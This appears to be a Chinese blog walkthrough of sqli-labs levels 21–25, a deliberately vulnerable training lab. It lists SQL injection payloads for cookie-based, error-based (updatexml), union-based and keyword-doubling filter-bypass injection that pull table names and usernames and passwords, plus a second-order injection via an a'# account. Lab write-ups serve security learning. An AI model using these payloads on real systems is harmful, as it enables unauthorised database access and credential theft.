Sqli-labs-master的21—25通关教程

目录

Less-21('闭合)

查询数据库名

查询数据库中的表

查询表中字段名

查询表中数据

Less-22("闭合)

查询数据库名

查询数据库中的表

查询表中字段名

查询表中数据

Less-23

查询数据库名

查询数据库中的表

查询表中字段名

查询表中数据

Less-24(二次注入)

Less-25

查询数据库名

查询数据库中的表

查询表中字段名

查询表中数据


Less-21('闭合)

登录成功后发现cookie可以显示出来,但是是乱码

登录成功后显示的页面中cookie是一串看不懂的字符, 看了后端代码后发现,是因为这里被编码过了, 那么抓包后修改cookie的值并进行 base64 编码

查询数据库名

sql 复制代码
') union select 1,2,database() #

查询数据库中的表

sql 复制代码
') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #

查询表中字段名

sql 复制代码
') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1) #

查询表中数据

sql 复制代码
') and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from users),0x7e),1) #

Less-22("闭合)

查询数据库名

sql 复制代码
" union select 1,2,database() #

查询数据库中的表

sql 复制代码
" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #

查询表中字段名

sql 复制代码
" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1) #

查询表中数据

sql 复制代码
" and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from users),0x7e),1) #

Less-23

直接在 URL 后面构造语句

查询数据库名

sql 复制代码
-1' union select 1,database(),3 and '1' = '1

查询数据库中的表

sql 复制代码
-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 or '1'='1

查询表中字段名

sql 复制代码
-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 or '1'='1

查询表中数据

sql 复制代码
-1' union select 1,(select group_concat(username,0x7e,password) from users),3 or '1'='1

Less-24(二次注入)

注册一个用户名 a 密码 123123 的用户

登录发现登录成功

查询数据库中的表的内容发现写入进去了

注册一个 a'# 的账户

登录上去用错误的密码修改

发现修改成功,用修改后的密码登录,发现登录成功

说明二次注入成功

Less-25

查询数据库名

sql 复制代码
-2' union select 1,2,database() --+

查询数据库中的表

sql 复制代码
-2' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security' --+

查询表中字段名

sql 复制代码
-2' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema='security' aandnd table_name='users' --+

查询表中数据

sql 复制代码
-1'union select 1,group_concat(username,0x3a,passwoorrd),3 from users --+
相关推荐
派可数据BI可视化15 分钟前
商业智能BI 浅谈数据孤岛和数据分析的发展
大数据·数据库·数据仓库·信息可视化·数据挖掘·数据分析
左灯右行的爱情16 分钟前
4-Spring SPI机制解读
java·后端·spring
Code小翊16 分钟前
C语言bsearch的使用
java·c语言·前端
yong999017 分钟前
C#驱动斑马打印机实现包装自动打印
java·数据库·c#
好记忆不如烂笔头abc17 分钟前
linux系统记录登录用户的所有操作
java·linux·服务器
sp4238 分钟前
一套清晰、简洁的 Java AES/DES/RSA 加密解密 API
java·后端
野犬寒鸦1 小时前
从零起步学习MySQL || 第五章:select语句的执行过程是怎么样的?(结合源码深度解析)
java·服务器·数据库·后端·mysql·adb
橘子海全栈攻城狮1 小时前
【源码+文档+调试讲解】基于SpringBoot + Vue的知识产权管理系统 041
java·vue.js·人工智能·spring boot·后端·安全·spring
Chloeis Syntax1 小时前
接10月12日---队列笔记
java·数据结构·笔记·队列
QT 小鲜肉1 小时前
【个人成长笔记】Qt 中 SkipEmptyParts 编译错误解决方案及版本兼容性指南
数据库·c++·笔记·qt·学习·学习方法